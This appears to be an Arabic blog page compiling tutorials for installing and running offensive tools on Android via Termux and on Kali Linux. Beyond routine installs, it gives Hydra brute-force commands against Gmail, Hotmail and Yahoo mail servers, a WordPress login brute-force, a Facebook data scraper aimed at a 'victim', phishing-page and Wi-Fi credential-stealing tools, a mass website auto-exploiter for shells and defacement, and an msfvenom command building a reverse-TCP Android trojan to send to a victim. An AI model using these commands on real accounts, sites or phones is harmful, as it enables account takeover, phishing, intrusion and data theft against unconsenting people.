تثبيت كالي نت هانتر على الهواتف (بدون روت) - تارموكس

0
تثبيت كالي نت هانتر على الهواتف (بدون روت) - تارموكس
Kali NetHunter عبارة عن ROM يعمل بنظام Android ويتضمن نظامًا لاختبار الاختراق مثل نظام كالي لينكس على اجهزة الكمبيوتر. وهو متاح رسميًا للتنزيل على أجهزة معينة مثل أجهزة Nexus الحديثة و OnePlus One، وكذلك بعض الاجهزة من Samsung Galaxy. كما أنه يعمل بشكل غير رسمي على الهواتف الأخرى.
عملية تثبيته تتطلب صلاحيات الروت واجهزة محددة ولهذا تم برمجة سكربت يقوم بتثبيت أدوات نت هانتر على اي نظام اندرويد واي هاتف عبر تطبيق تارموكس وهذا ما سنقوم بشرحه في موضوعنا اليوم بطريقتين.
سكربت Kali NetHunter هذا السكربت الوحيد الذي يمكنك من خلاله تثبيت Kali nethunter  في تطبيق تارموكس بدون الحاجة لصلاحيات الروت.
نحتاج أولا لفتح تطبيق تارموكس لبدأ عملية التثبيت
أو 
يمكنك تثبيت تارموكس من هذا الموضوع ان لم يكن مثبتا بهاتفك

خطوات تثبيت نت هانتر NetHunter

1- نقوم بتنزيل السكربت في الهوم Home
لكن أولا نقوم بتثبيت اداة التنزيل curl اذا كانت غير موجودة من قبل
pkg install curl
curl -LO https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter

2- إعطاء صلاحية التنفيذ
chmod +x kalinethunter
3- تشغيل نت هانتر
./kalinethunter
4- الان أكتب الأمر startkali لبدأ تشغيل نت هانتر
startkali

5- هذه الخطوات إجبارية للاستخدام في أول مرة لتشغيل السكربت فقط.
بعد أن كتبت الامر السابق "startkali" قم ادخال الامر الاتي لتنزيل مفاتيح التشفير المعتمدة لعملية التنزيل من المستودعات.
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
ثم أدخل أمر تثبيت الحزمة المنزلة
apt install ./kali-archive-keyring_2018.1_all.deb
طبعا المفروض انتهينا من عملية تثبيت السكربت بنجاح.
ملاحظة:
اذا ظهر لك هذا الخطأ مثلا: في حالة حدوث خطأ SSL: فشل التحقق من الشهادة - SSL error: certificate verify failed
قم باصلاحه بهذه الطريقة.

أعد تشغيل السكربت نت هانتر مع التعليمة الإضافية --insecure لتجاهل الشهادة
ليصبح الامر بهذا الشكل:
./kalinethunter --insecure

الطريقة الثانية لتثبيت نت هانتر من موقع ويكي تارموكس 

افتح تارموكس وأدخل بها الاوامر الاتية:
pkg install wget
wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
chmod +x kalinethunter
bash kalinethunter
ثم تثبيت شهادة ومفاتيح التشفير
apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt --fix-broken install
dpkg -i ./kali-archive-keyring_2018.1_all.deb

شرح Cl0neMast3r لتثبيت أدوات اختبار الاختراق بسهولة

0
شرح Cl0neMast3r لتثبيت أدوات اختبار الاختراق بسهولة

ماهي أداة Cl0neMast3r؟

هو سكربت مبرمج بالبايثون Python تم تكويده ليجعل حياتك أسهل. يمكنك الآن اختيار أدواتك المفضلة بسهولة من GitHub وتثبيتها على نظامك بنقرة واحدة. والأفضل من ذلك أنه يمكنك التأكد من أن لديك أحدث إصدار من أدواتك المفضلة. كل هذا وأكثر يمكنك القيام به . أداة Clone Master موجهة خصيصًا لاختبار الاختراق وصائدي الأخطاء 😉

خيارات الأداة Cl0neMast3r

الخياروصف وشرح الخيار
Aاضافة أداة من GitHub باستخدام رابط URL
Fايجاد الاداة في GitHub
Rاعادة تثبيت الاداة
Uتحديث الأداة
Sعرض المعلومات حول أدواتك المفضلة
Dحدف قائمة الأدوات
Mاستيراد ادواتك المفضلة
Xتصدير أدواتك الى HTML

طريقة تثبيت أداة Cl0neMast3r على كالي لينكس وباروت وتارموكس
git clone https://github.com/Abdulraheem30042/Cl0neMast3r.git 
cd Cl0neMast3r/ 
تثبيت مستلزمات الاداة من  requests وbeautifulsoup4
pip install -r requirements.txt

لتشغيل الأداة:-

نعطيها صلاحيات التشغيل
chmod +x Cl0neMast3r.py
ثم أمر التشغيل:-
python Cl0neMast3r.py

أنظمة التشغيل المدعومة:-

لا يدعم Windows, تم اختبار Cl0neMast3r على:
  • macOS High Sierra
  •  Kali Linux
  •  Linux Mint

صور من الأداة

طريقة اعادة تثبيت أداة
البحث عن أداة مثلا ettercap
البحث عن أداة مثلا xss.swf
طريقة اضافة مستودع اداة جديد

عرض الأداوت

شرح اداة WPSeku فحص المواقع الووردبريس من الثغرات على تارموكس

0
شرح اداة WPSeku فحص المواقع الووردبريس من الثغرات على تارموكس

سنقدم لك اليوم درسًا تعليميًا حول كيفية تثبيت أداة WPSeku على هواتف اندرويد بواسطة تطبيق تارموكس - Termux، ولمن لا يعرف أداة WPSeku 

أداة WPSeku التسمية مستوحات من Wordpress Security Scanner

كانت هنالك أداة WPscan والتي هي عبارة عن سكربت مبرمج بلغة الروبي يقوم بفحص المواقع المركبة عليها سكربت ووردبريس ويقوم باستخراج الثغرات الموجودة بها أو بالاضافات المركبة عليها. واستخراج أسماء المستخدمين والتخمين على كلمات السر الخاصة بهم. (مضمنة مسبقا على نظام كالي لينكس)
الأداة WPSeku لا تختلف عنها سوى أنها مبرمجة بلغة بايثون ومخصصة لأنظمة الأندرويد.

طريقة تثبيت WPSeku على أندرويد / تارموكس

  • افتح تطبيق تارموكس ثم قم بالتحديث والترقية أولاً.
apt && apt upgrade -y  
apt install git python3
  • ثم نشرع بتثبيت الأداة بنسخ ولصق التعليمات داخل تطبيق Termux واحدة تلو الاخرى
git clone https://github.com/m4ll0k/WPSeku.git
cd WPSeku
pip install -r requirements.txt
  • نشغل الأداة WPSeku بالأمر:
python3 wpseku.py
  • طريقة الاستخدام 
python --target http://www.site.com
شرح WPSeku فحص المواقع

تخمين كلمات السر / Bruteforce Login

python3 wpseku.py --url https://www.site.com --brute --user test --wordlist wl.txt --verbose
  • غير test  باسم المستخدم
  • قم بتغيير wl.txt لاسم ملف التخمين (ملف الباسووردات)
تخمين كلمات السر / Bruteforce Login WPSeku

أداة OSIF استخراج المعلومات من حساب الفايسبوك على تارموكس

0
أداة OSIF استخراج المعلومات من حساب الفايسبوك على تارموكس

أداة OSIF اختصار لـ Open Source Information Facebook

عبارة عن تجميع سكربت مبرمج بلغة بايثون يقوم باستخراج المعلومات من حساب الفايسبوك، ويمكن حفظ جميع المعلومات الحساسة بسهولة, حتى وان كان صاحب الحساب الهدف حول جميع خصوصيته إلى (أنا فقط)، والمعلومات الحساسة تتضمن: مكان الإقامة وتاريخ الميلاد والوظيفة ورقم الهاتف وعنوان البريد الإلكتروني.


[ طريقة التثبيت على تارموكس ]

pkg update upgrade
pkg install git python2
git clone https://github.com/ciku370/OSIF
cd OSIF

[ تثبيت مستلزمات التشغيل]

pip2 install -r requirements.txt

[ طريقة تشغيل osif]

python2 osif.py

[ لقطة من الشاشة ]

أداة OSIF استخراج المعلومات من حساب الفايسبوك
أه نسيت يمكنكم تثبيت الأداة أيضا على كالي لينكس والأشباه
طريقة تثبيت OSIF على كالي لينكس وباروت وباك بوكس
root@wikikali:~$ git clone https://github.com/ciku370/OSIF.git
root@wikikali:~$ cd OSIF
root@wikikali:~$ pip2 install -r requirements.txt
root@wikikali:~$ python2 osif.py
لمعرفة أوامر الأداة أكتب help
لمعرفة أوامر الأداة أكتب help osif
لاستخراج عدد الاصدقاء أدخل الأمر
get_data
لاستخراج معلومات أكتب الأمر
get_info
سيظهر لك سؤال يطالبك بادخال ID الخاص بالضحية تقوم بادخاله فقط ثم انتر وستظهر لكم المعلومات

لاستخراج البريد الالكتروني قم بكتابة 
token
ثم قم بالتسجيل الدخول لحسابك
الان أكتب
dump_mail
وستظهر لك الايميلات
dump_mail وستظهر لك الايميلات أداة OSIF
في أمان الله.

برنامج الهندسة الاجتماعية Social Engineering Toolkit على تارموكس

0
برنامج الهندسة الاجتماعية Social Engineering Toolkit على تارموكس

برنامج الهندسة الاجتماعية Social Engineering Toolkit على تارموكس

الهندسة الاجتماعية (Social Engineering) عبارة عن هجوم يستهدف السلوك البشري للانسان عن طريق التلاعب به وكسب ثقته, بهدف الحصول على بياناته السرية مثل الحساب المصرفي أو حسابات التواصل الاجتماعي والبريد الإلكتروني أو حتى للوصول إلى جهاز الكمبيوتر المستهدف عبر ارسال بايلود, مع العلم أنه يمكن أن يكون نظام التشغيل الخاص به آمن, لكن الهندسة الاجتماعية لا تستهدف الجهاز بل تستهدف العنصر البشري بمى يسمى اختراق العقول.

في هذا المقال سوف نتعرف على اقوى اداة هندسة اجتماعية وهي اداة The Social-Engineer Toolkit أو باختصار SET  وهي اداة مفتوحة المصدر لعمل العديد من الهجمات مثل: انشاء الصفحات المزورة (كما بالصورة أسفله) أو التخمين على الباسوردات أو إرسال SMS مزيفة أو انشاء باك دور واختراق الجهاز, ايضاً يمكن اخذ البيتكوين من الضحية مجرد الحصول على الـ QR يوجد العديد من الهجمات الاخرى نترككم لتكتشفوها بانفسكم.
انشاء الصفحات المزورة - فيسبوك

طريقة تثبيت Social Engineering Toolkit على تارموكس

انسخ الأوامر وقم بلصقها في برنامج تارموكس
git clone https://github.com/AnonHackerr/setoolkitinstaller.git
cd setoolkitinstaller
chmod +x setoolkitinstall.sh
./setoolkitinstall.sh

صور من الأداة SET
طريقة تثبيت Social Engineering Toolkit على تارموكس
 Social Engineering Toolkit على تارموكس

The Social-Engineer Toolkit (SET) automatic installer for Android
قد يهمك أيضا:

تثبيت اداة اختراق شبكات الواي فاي wifiphisher على تارموكس

0
تثبيت اداة اختراق شبكات الواي فاي wifiphisher على تارموكس

تثبيت اداة اختراق شبكات الواي فاي wifiphisher على تارموكس

wifiphisher هي أداة تصيد أو بعبارة أخرى تسجيل الدخول المزيف لأنه يستخدم طريقة التصيّد ، لذا فنحن لا نحتاج إلى التخمين bruteforce  بواسطة قائمة كلمات المرور, بالعكس هذه الطريقة مربحة وناجحة ولا تعتمد على قائمة الكلمات المحتملة التي نصنعها.

كيف تعمل ويفي فيشرwifiphisher 

تتمثل طريقة عمل Wifiphisher في تجميد شبكة الويرلس الهدف AP (نقطة الوصول). ثم إنشاء نقطة وصول مزيفة من خلال تقليد / استنساخ اسم نقطة الوصول من الهدف بحيث تقوم الضحية بتسجيل الدخول إلى نقطة الوصول المزيفة  SSID ، وعندما يتم تسجيل دخول الضحية سيتم إدخال كلمة المرور تلقائيا.
تتمثل طريقة عمل Wifiphisher في تجميد شبكة الويرلس الهدف AP

طريقة تثبيت ويفي فيشر wifiphisher على تارموكس

سنقوم بتثبيت بعض أدوات الدعم والمستلزمات أولاً ، بكتابة الأمر:
apt-get install git
apt-get install python python-pip python-setuptools
pip install scapy
بعد ذلك ، فإننا  نقوم بتنزيل أو باستنساخ برنامج wifiphisher من Github ثم التثبيت
أكتب الأمر:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
python setup.py install

لتشغيل أداة wifiphisher 

أدخل للمجلد بالأمر:
cd wifiphisher
أمر تشغيل السكربت
python wifiphisher
صور من داخل الاداة

نافذة تسجيل الدخول مزيفة
نافذة تسجيل الدخول مزيفة فايسبوك ويفي فيشر
الحصول على حسابات الضحية(ايميل والباس)
الحصول على حسابات الضحية(ايميل والباس) ويفي
قد يهمك أيضا:

تثبيت 19 أداة اختبار اختراق على تارموكس بواسطة سكربت Toolss

0
تثبيت أدوات اختبار الاختراق على تارموكس تلقائيا Toolss
Toolss عبارة عن سكربت مبرمج بلغة البايثون, يقوم بتثبيت أدوات اختبار الاختراق على الاندرويد, سيغنيك عن كتابة العديد من الاوامر لتثبيت الحزم والادوات, ستحتاج فقط لادخال رقم الاداة المراد تثبيتها أو اختيار تثبيت الكل دفعة واحدة.

الأدوات المتوفرة في سكربت Toolss

1. Install Nmap 
2. Install Hydra
3. Install SQLMap
4. Install Metasploit
5. Install ngrok
6. Install Kali Nethunter
7. Install angryFuzzer
8. Install Red_Hawk
9. Install Weeman
10. Install IPGeoLocation
11. Install Cupp
12. Instagram Bruteforcer (instahack)
13. Twitter Bruteforcer   (TwitterSniper)
14. Install Ubuntu
15. Install Fedora
16. Install viSQL
17. Install Hash-Buster
18. Install D-TECT
19. Install routersploit
الأدوات المتوفرة في سكربت Toolss

طريقة تثبيت الأداة Toolss

  • افتح برنامج تارموكس وانسخ الأوامر سطر سطر.
  • نقوم بتثبيت بعض المتطلبات أولا وهي البايثون Python واداة Git
pkg update
pkg upgrade 
pkg install python
pkg install git
  • ثم نشرع بتنزيل وتثبيت الاداة Toolss :
git clone https://github.com/AnonHackerr/toolss.git
cd toolss
chmod +x Toolss.py
أمر تشغل الاداة Toolss 
python Toolss.py
في أمان الله
قد يهمك أيضا:

شرح تثبيت أداة التخمين Hydra على الاندرويد (تارموكس - Termux)

0
شرح تثبيت أداة التخمين Hydra على الاندرويد (تارموكس - Termux)
Hydra هي أداة تخمين تستخدم لاختبار اختراق عن طريق الهجوم على العديد من البروتوكولات . هي اداة سريعة ومرنة للغاية ، والموديلات الجديدة سهلة الإضافة. تتيح هذه الأداة للباحثين وخبراء الأمن إظهار مدى امكانية اختراق كلمات السر الخاصة بالانظمة عن بعد.
تدعم البروتوكلات الاتية:
 Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP

امكانيات الأداة هيدرا Hydra

  • يمكن اختراق حسابات البريد الالكتروني مثل جيميل وياهو ..
  • اختراق السيرفرات والدخول عبر النفق المشفر SSH البورت 22
  • اختراق اجهزة الراوتر  والحصول على بيانات صفحة تسجيل الدخول HTTP
  • اختراق بروتوكول نقل الملفات FTP البورت 21
  • اختراق سطح المكتب البعيد RDP البورت 3389
  • اختراق التالنت Telnet عبر البورت 23
  • اختراق قواعد البيانات الخاصة بالمواقع عن بعد Mysql عبر البورت 3306
  • وغيرها الكثير ..
تعتمد الاداة في اختراق العديد من الحسابات عن طريق هجوم التخمين Brute-force >> Attack ..اي تخمن الباسوردات حتى تحصل على الباسورد الصحيح

لاختراق حساب جيميل (gmail) كمثال تابع معي:
يجب تثبيت أداة Hydra على تارموكس

1. للتثبيت انسخ الامر الأتي على تارموكس:
pkg install hydra
2. لتشغيل الاداة نكتب الامر hydra
hydra
الان كل ما تحتاجه هو قائمة باسووردات أو كلمات المرور التي تحتوي على كلمات المرور المحتملة
تجدها هنا:
وهذه اداة لصنع  Wordlist تخمين: 
الامر:-
hydra smtp.gmail.com smtp -l test@gmail.com -P /home/wordlist.txt -S 465 -v -V
  • غير /home/wordlist.txt بمسار الوورد ليست أو قائمة كلمات المرور.
  • وضع ايميلك بدل test@gmail.com
وبعدها ستنتظر قليلا لتتم عملية التخمين وستظهر لك كلمة password باللون الأخضر وستظهر كلمة السر الخاصة بالحساب.

اذا اردت اختبار اختراق حسابات البريد الالكتروني الاخرى غير الهوست والبورت
(Gmail) 
server: smtp.gmail.com 
port: 465 
(hotmail) 
server: smtp.live.com 
port: 587 
(yahoo) 
server: smtp.mail.yahoo.com 
port: 587
الاوامر:
سرفر gmail:
hydra smtp.gmail.com smtp -l email@gmail.com -P /home/wordlist.txt -S 465 -v -V
سرفر hotmail:
hydra smtp.live.com smtp -l email@hotmail.com -P /home/wordlist.txt -S 587 -v -V
سرفر yahoo:
hydra smtp.mail.yahoo.com smtp -l email@yahoo.com -P /home/wordlist.txt -S 587 -v -V
قد يهمك أيضا:

شرح كيفية تثبيت أداة NMAP في الاندرويد تارموكس - Termux

0
شرح كيفية تثبيت أداة NMAP في الاندرويد  تارموكس - Termux

NMAP  أداة فحص للثغرات ويستخدم لاكتشاف المضيفين والخدمات على شبكة الكمبيوتر، وبالتالي خلق "خريطة" للشبكة. ولتحقيق هدفها يقوم NMAP بإرسال الحزم التي وضعت خصيصا للمضيف المستهدف ويقوم بتحليلها ثم يقوم بعرض النتائج. بشكل مبسط nmap هو اداة إختبار الشبكات وعرض الثغرات المفتوحة والآجهزة المتصلة على الشبكة

مميزات Nmap

  • اكتشاف المضيف : تحديد المضيفين على الشبكة. على سبيل المثال : الإستماع للمضيفين الذين يستجيبون لـطلبات TCP و/أو ICMP أو لديهم منفذ محدد مفتوح.
  • فحص المنافذ : عرض المنافذ المفتوحة على مضيف معين.
  • تحديد النسخة : فحص خدمات الشبكة على الأجهزة البعيدة لتحديد أسماء التطبيقات ورقم النسخة.
  • تحديد النظام : تحديد نظام التشغيل و خصائص مكونات الكمبيوتر (Hardware) لأجهزة الشبكة.
  • التفاعل البرمجي مع الهدف : باستخدام المحرك البرمجي لـ Nmap اختصارأ NSE و لغة البرمجة Lua.
Nmap يستطيع توفير معلومات أكثر عن الأهداف, يتضمن أسماء DNS العكسية , وأنواع الأجهزة , وعناوين MAC.

الأستخدام الشائع لـNmap

  • التدقيق في أمن الجهاز أو الجدار الناري عن طريق تحديد اتصالات الشبكة التي يمكن إجراؤها خارجها أو داخلها.
  • تحديد المنافذ المفتوحة على الجهاز المستهدف خلال عملية التدقيق.
  • جرد وتخطيط الشبكة بالإضافة لصيانتها وإدارتها.
  • التدقيق في أمن الشبكة عن طريق تحديد خوادم جديدة.
  • توليد مسارات للأجهزة على الشبكة وتحليل الإجابات في الشبكة ووقت الإجابات.
  • إيجاد واستغلال الثغرات في الشبكة.
قبل تثبيت الأداة يجب أولاً تنزيل وتثبيت تطبيق Termux على هاتفك المحمول من متجر Play. لا يهم ان كان هاتفك الجوّال بدون روت No Root.
بعد تنزيل وتثبيت تطبيق تارموكس افتح التطبيق من القائمة
الآن اكتب الامر الاتي في تارموكس
apt update && apt upgrade 
واضغط على Enter
الامر السابق سيقوم بالتحديث المستودعات والترقية لأحدث اصدار
 الآن اكتب
termux-setup-storage 
شرح الامر السابق:- termux-setup-storage
يتم منح هذا الإذن للتخزين المشترك لـ Termux عند تشغيله على Android 6.0 أو إصدار أحدث،
بحيث يتم فيه إنشاء مجلد خاص بالتطبيق على وحدة التخزين الخارجية (في حالة وجود وحدة تخزين خارجية) ، سيتم إنشاء مجلد HOME/storage$
المجلد الذي تم إنشاؤه هي روابط إلى مجلدات تخزين مختلفة:
مثل:- 
~/storage/shared
جذر التخزين المشترك (أي /sdcardالدليل) ،

~/storage/downloads
الدليل القياسي للتنزيلات من متصفح النظام ،

~/storage/dcim
الموقع التقليدي للصور ومقاطع الفيديو عند تركيب الجهاز ككاميرا ،

~/storage/pictures
الدليل القياسي الذي يمكن من خلاله وضع الصور المتاحة للمستخدم ،

~/storage/music
دليل قياسي لوضع أي ملفات صوتية في قائمة الموسيقى العادية للمستخدم ،

~/storage/movies
الدليل القياسي الذي يمكن من خلاله وضع الأفلام المتاحة للمستخدم ،

~/storage/external
يمكنك الارتباط Symlink بمجلد Termux-private على وحدة تخزين خارجية (فقط في حالة توفر وحدة تخزين خارجية).

الآن أنت جاهز لتثبيت حزم  وأدوات اختراق على هاتفك المحمول

كيفية تثبيت أداة NMAP في تارموكس Termux 

Nmap هي أداة فحص الاجهزة والسيرفرات والمواقع وتستخدم لجمع المعلومات ونقاط الضعف ، لتثبيت nmap على هاتفك الجوال عبر تارموكس termux
طبعا يمكنك استخدام git لاستنساخ الملفات مباشرة من github  أو يمكنك تنزيل الملفات يدويًا على بطاقة sdcard والاستخدام. لكننا اليوم سنستخدم طريقة بسيطة جدا.
قم بكتابة الأمر الاتي في تارموكس:-
pkg install nmap
واضغط على Enter.
بعد اكتمال اعملية لفتح اداة Nmap أكتب الأمر
nmap

شرح أداة DarkFly 2019.1 يتضمن 487 أداة على Termux ولينكس

0
شرح أداة DarkFly 2019.1 يتضمن 487 أداة على Termux و اللينكس

شرح أداة DarkFly-2019.1

عبارة عن سكربت مفيد جدا, تجعل من السهل عليك تثبيت أدوات اختبار الاختراق, بدون كتابة git clone وغيرها من أوامر التثبيت المملة, هذه الأدوات مفتوحة المصدر وأدوات سريعة وتلقائية تضيف مستخدمي github المفضلين لديك ومن ثم التنزيل من المستودعات التي تريدها.ما عليك سوى اختيار الرقم. الأداة التي تريد تثبيتها. هناك حوالي 500 أدواة جاهزة للتثبيت.

التثبيت على نظام Linux (كمستخدم روت)

apt-get install git
git clone https://github.com/Ranginang67/DarkFly-2019.1
cd DarkFly-2019.1
chmod +x install.py
python3 install.py install
ملاحظة:
أضف امر sudo قبل الاوامر ان كنت مستخدم عادي.

شرح التثبيت على تارموكس Termux

pkg install git python -y
git clone https://github.com/Ranginang67/DarkFly-2019.1
cd DarkFly-2019.1
chmod +x install.py
python install.py install

فحص المواقع من الثغرات واختراقها XAttacker على Termux و Linux

0

شرح اداة فحص المواقع من الثغرات واختراقها XAttacker Tool على Termux و Linux

شرح اداة X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter  

XAttacker Tool هي اداة فحص المواقع من الثغرات واختراقها , مبرمجة بلغة البيرل تقوم باستخراج نقاط الضعف والثغرات الامنية الخطيرة التي تتسبب في اختراق المواقع, ويمكن استغلالها ايضا, يمكن استخدام الادة للحصول على  الشيل, والسيبانيل وقواعد البيانات وغيرها  Shells | Sends | Deface | cPanels | Databases

مميزات الاداة XAttacker Tool 

هذه قائمة من الهجمات التي يمكن للاداة تنفيذها, وعلى عدة انواع من سكربتات ادارة المحتوى  Cms سواء وورد بريس او جوملا او بريستاشوب غيره...
[+] Auto Cms Detect
[1] WordPress :
[+] Adblock Blocker 
[+] WP All Import 
[+] Blaze 
[+] Catpro 
[+] Cherry Plugin
[+] Download Manager
[+] Formcraft 
[+] levoslideshow 
[+] Power Zoomer
[+] Gravity Forms
[+] Revslider Upload Shell
[+] Revslider Dafece Ajax
[+] Revslider Get Config
[+] Showbiz
[+] Simple Ads Manager
[+] Slide Show Pro
[+] WP Mobile Detector
[+] Wysija
[+] InBoundio Marketing
[+] dzs-zoomsounds
[+] Reflex Gallery
[+] Creative Contact Form
[+] Work The Flow File Upload
[+] WP Job Manger
[+] PHP Event Calendar
[+] Synoptic
[+] Wp Shop
[+] Content Injection 
[+] Cubed Theme NEW 
[+] Rightnow Theme NEW 
[+] Konzept NEW 
[+] Omni Secure Files NEW 
[+] Pitchprint NEW 
[+] Satoshi NEW 
[+] Pinboard NEW 
[+] Barclaycart NEW

[2] Joomla
[+] Com Jce
[+] Com Media
[+] Com Jdownloads
[+] Com Fabrik
[+] Com Jdownloads Index
[+] Com Foxcontact
[+] Com Ads Manager
[+] Com Blog
[+] Com Users
[+] Com Weblinks
[+] mod_simplefileupload 
[+] Com Facileforms NEW 
[+] Com Jwallpapers NEW 
[+] Com Extplorer NEW 
[+] Com Rokdownloads NEW 
[+] Com Sexycontactform NEW 
[+] Com Jbcatalog NEW

[3] DruPal
[+] Add Admin 
[+] Drupalgeddon NEW

[4] PrestaShop
[+] columnadverts
[+] soopamobile
[+] soopabanners
[+] Vtermslideshow
[+] simpleslideshow
[+] productpageadverts
[+] homepageadvertise
[+] homepageadvertise2
[+] jro_homepageadvertise
[+] attributewizardpro
[+] 1attributewizardpro
[+] AttributewizardproOLD
[+] attributewizardpro_x
[+] advancedslider
[+] cartabandonmentpro
[+] cartabandonmentproOld
[+] videostab
[+] wg24themeadministration
[+] fieldvmegamenu
[+] wdoptionpanel
[+] pk_flexmenu
[+] pk_vertflexmenu
[+] nvn_export_orders
[+] megamenu
[+] tdpsthemeoptionpanel
[+] psmodthemeoptionpanel
[+] masseditproduct 
[+] blocktestimonial NEW

[5] Lokomedia
SQL injection

مميزات الاداة XAttacker Tool

طريقة تحميل الاداة XAttacker 

على نظام لينكس Linux

git clone https://github.com/Moham3dRiahi/XAttacker.git
cd XAttacker
perl XAttacker.pl

على تارمكس Termux

git clone https://github.com/Moham3dRiahi/XAttacker.git
cd XAttacker
chmod +x termux-install.sh
bash termux-install.sh

طريقة تشغيل الاداة XAttacker 


تشغيلها وتنفيذ الاهجوم سهل جدا, تقوم بانشاء ملف نصي list.txt يحتوي على المواقع المراد اختبار اختراقها / اختراقها وتمررها للاداة بهذه الطريقة
perl XAttacker.pl -l list.txt
فيديو خاص لمبرمج الاداة يثب قوة الاداة
   الاخ: محمد رياحي
Coded by Mohamed Riahi

إخلاء المسؤولية: 
هذه البرامج مفيدة لكل مخترق أخلاقي “Ethical Hacker” يعمل في مجال إختبار اختراق المواقع وتأمينها ولذلك، نحن غير مسؤولون إن كنت تستخدم التطبيقات في أذية الاخرين ,وتعتبر المسؤولية القانونية على من يستخدم هذه البرامج لذلك، استخدم هذه التطبيقات بحذر وبدون أذى.

شرح اداة HiddenEye لانشاء صفحات مزورة على kali linux و termux

0
شرح اداة HiddenEye لانشاء صفحات مزورة على kali linux و termux

أداة HiddenEye حديثة مع وظائف متقدمة خاصة للاستهداف والتصيد, تعتمد على انشاء صفحات مزورة لاختراق حسابات الضحية, أضيف لها كايلوغر keylogger يقوم باستخراج معلومات هامة من جهاز الضحية .
الصفحات التي يمكن للاداة تزويرها هي:

+ Facebook:
  • Traditional Facebook login page.
  • Advanced Poll Method.
  • Fake Security login with Facebook Page.
  • Facebook messenger login page.

+ Google:
  • Traditional Google login page.
  • Advanced Poll Method.

+ LinkedIn:
  • Traditional LinkedIn login page.
+ Github:
  • Traditional Github login page.
+ Stackoverflow:
  • Traditional Stackoverflow login page.
+ Wordpress:

Similar Wordpress login page.
+ Twitter:
  • Traditional Twitter login page.
+ Instagram:
  • Traditional Instagram login page.
  • Instagram Autoliker Phishing Page.
  • Instagram Profile Scenario Advanced attack.

NEW PAGES الصفحات الحديثة
1) FACEBOOK PHISHING:
  • Traditional Facebook login page.
  • Advanced Poll Method.
  • Fake Security login with Facebook Page.
  • Facebook messenger login page.

2) INSTAGRAM PHISHING:
  • Traditional Login Page
  • Fake instagram Autoliker Page
  • Instagram Profile Scenario Advanced attack.

3) SNAPCHAT PHISHING:
  • Traditional Snapchat Login Page
4) YAHOO PHISHING:
  • Traditional Yahoo Login Page
5) TWITCH PHISHING:
  • Traditional Twitch Login Page [ Login With Facebook Also Available ]
6) MICROSOFT PHISHING:

Traditional Microsoft-Live Web Login Page
7) STEAM PHISHING:
  • Traditional Steam Web Login Page
8) VK PHISHING:
  • Traditional VK Web Login Page
  • Advanced Poll Method
9) ICLOUD PHISHING:
  • Traditional iCloud Web Login Page


تعمل HiddenEye على الانظمة الاتية.

Kali Linux - Rolling Edition

Parrot OS - Rolling Edition

Linux Mint - 18.3 Sylvia
Ubuntu - 16.04.3 LTS
MacOS High Sierra
Arch Linux
Manjaro XFCE Edition 17.1.12
Black Arch
TERMUX (For Android Users)


PREREQUISITES ( متطلبات التشغيل )

  • Python 3
  • Wget from Python
  • PHP
  • sudo

طريقة تحميل الاداة HiddenEye

git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git

أمر تشغيل الاداة HiddenEye

python HiddenEye.py

شرح اداة HiddenEye
مطوري الاداة HiddenEye :
  • UNDEADSEC (https://github.com/UndeadSec)
  • USAMA ABDUL SATTAR (https://github.com/usama7628674)
  • ANONUD4Y (https://github.com/An0nUD4Y)
  • Artur Tretiak (https://github.com/sTiKyt)
  • Micrafast (https://github.com/Micrafast)

CREDIT:-

  • Usama ( A Most active Developer)
  • Anonud4y ( I can't remember if i have done Anything )
  • Artur ( Guy Who recustomized everything )
  • UNDEADSEC (For His wonderful repo socialfish which motivated us a lot)
  • TheLinuxChoice ( For The ideas from his repo Shellphish )

كيف يتم اختراق الاندرويد بواسطة البايلود في الميتاسبلويت

0
كيف يتم اختراق الاندرويد بواسطة البايلود في الميتاسبلويت

كيف يتم اختراق الاندرويد بواسطة البايلود في الميتاسبلويت

سنتعرف في هذا المقال على طريقة اختراق هواتف اندرويد بواسطة مشروع الميتاسبلويت, سنستعمل ما يسمى البايلود ونتعلم كيف يتم تكوين البايلود والاختراق سواء كان داخل الشبكة باستعمال الايبي الداخلي  أو خارج الشبكة بالايبي الخارجي,

من المفروض أن لديك نظرة عن الاختراق بصفة عامة, وان لم يكن سأشرح بشكل بسيط كيف تتم العملية يجب أن تعرف أن الاختراق نوعين:
  • اختراق بواسطة التروجان أو السيرفر Client/server: 
وهذا ما سنتعرف عليه في هذا المقال, وهو عن طريق ارسال سيرفر للضحية وبعدما يتم فتحه, تتم عملية الاختراق, وهذا يتم بواسطة السيرفر server , والذي قام بفتح باب خلفي backdoor في النظام ومن خلاله نرسل ونستقبل البيانات عبر البورت.
  • الاختراق المتقدم Penetration Testing :
والذي يتم عن طريق اكتشاف الثغرات ونقاط الضعف Points vulnerability بالانظمة, وهذا النوع يتطكلب الكثير من المعرفة في الهندسة العكسية والشبكات والأنظمة والبرمجة ... .

ملحوظة:
البايلود Payload هو نفسه السيرفر server في برامج الرات RAT.
  • الأنواع المتاحه
  1. reverse_tcp
  2. reverse_http
  3. reverse_https
وتختلف فيما بينها في طريقة الاتصال (بروتوكول  tcp http https)

السيناريو بشكل عام

هو ارسال البايلود للضحية فيتم الاختراق, ثم نتحكم بالبايلود عن طريق مشروع  الميتاسبلويت والذي يلعب نفس دور المتحكم في برامج الرات العادية Client

طريقة انشاء االبايلود:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 R > /root/Desktop/server.apk
شرح الامر:
